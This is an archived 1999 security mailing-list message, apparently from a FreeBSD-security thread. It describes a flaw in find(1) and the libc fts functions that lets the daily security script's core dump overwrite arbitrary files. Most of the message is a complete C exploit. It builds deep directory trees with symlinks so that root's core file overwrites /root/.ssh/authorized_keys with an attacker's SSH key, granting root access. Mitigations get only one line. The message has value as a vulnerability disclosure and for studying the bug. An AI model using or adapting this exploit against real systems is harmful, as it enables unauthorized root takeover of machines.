FW: RE: fts_print() , find and other stuff ?

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Aug 25 1999 - 00:13:18 PDT

Next message: Larry W. Cashdollar: "Re: OCE' 9400 plotters"

Previous message: Norbert Warmuth: "Re: midnight commander vulnerability(?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----FW: <XFMail.990825091318.venglinat_private>-----

Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
Sender: owner-freebsd-securityat_private
From: Przemyslaw Frasunek <venglinat_private>
To: Rafal Banaszkiewicz <raf@tb-303.org>
Subject: RE: fts_print() , find and other stuff ?
Cc: freebsd-securityat_private

On 24-Aug-99 Rafal Banaszkiewicz wrote:

>       One of my friends has written sploit code for this bug ? It's old
> bug ... and it's still not fixed .

 Yes, this bug is quite easy to exploit. Find(1) runs every day from
 /etc/security script. It segfaults, when directory tree is _very_ long, because
 of junk pointer to directory name.

 Core is created in one of directories from our tree. But if find.core already
 exists, it's overwritten. It's possible to create symlink from eg.
 master.passwd or something else to find.core, and this file will be
 overwritten.

 Sample code below.

 BTW. Sorry for my poor English.

/*

 (c) 1999 babcia padlina ltd. <babuniaat_private>

 bug in fts libc functions allows to overwrite any file in system, when
 running /etc/security script (executed from 'daily' scripts).

 affected systems:
   - freebsd (all versions)
   - probably openbsd/netbsd

 fix:
   - limit root's coredump size
   - patch libc

*/

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <unistd.h>

#define STRING          "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE            "/root/.ssh/authorized_keys"
#define CORE            "find.core"
#define DEPTH           300
#define BUFSIZE         250

int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{

        if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
                return -1;

        if (chdir(dir))
                return -1;

        if (symlink(linkfrom, linkto) < 0)
                return -1;

        return 0;
}


int main(void)
{
        int i = 0;
        char pid[10], buf[BUFSIZE];

        sprintf(pid, "%d", getpid());

        if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
        {
                perror("mkdir()");
                return -1;
        }

        if (chdir(pid))
        {
                perror("chdir()");
                return -1;
        }

        bzero(buf, BUFSIZE);
        memset(buf, 0x41, BUFSIZE-1);

        for(i=0;i<DEPTH;i++)
        {
                if (makedir(STRING, FILE, CORE) < 0)
                {
                        perror("makedir()");
                        return -1;
                }

                if(makedir(buf, FILE, CORE) < 0)
                {
                        perror("makedir()");
                        return -1;
                }
        }

        return 0;
}

- --------------End of forwarded message-------------------------

- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: venglinat_private ** PGP: D48684904685DF43 EA93AFA13BE170BF *

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBN8OcA/6SPyHAYTvjEQLrywCfd5hMX9Cak+W1SuW7o4oA4o/RUPoAoJDC
8PVlnVtNw9p7rTmtBtTL3uC4
=P88V
-----END PGP SIGNATURE-----

Next message: Larry W. Cashdollar: "Re: OCE' 9400 plotters"
Previous message: Norbert Warmuth: "Re: midnight commander vulnerability(?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:59:26 PDT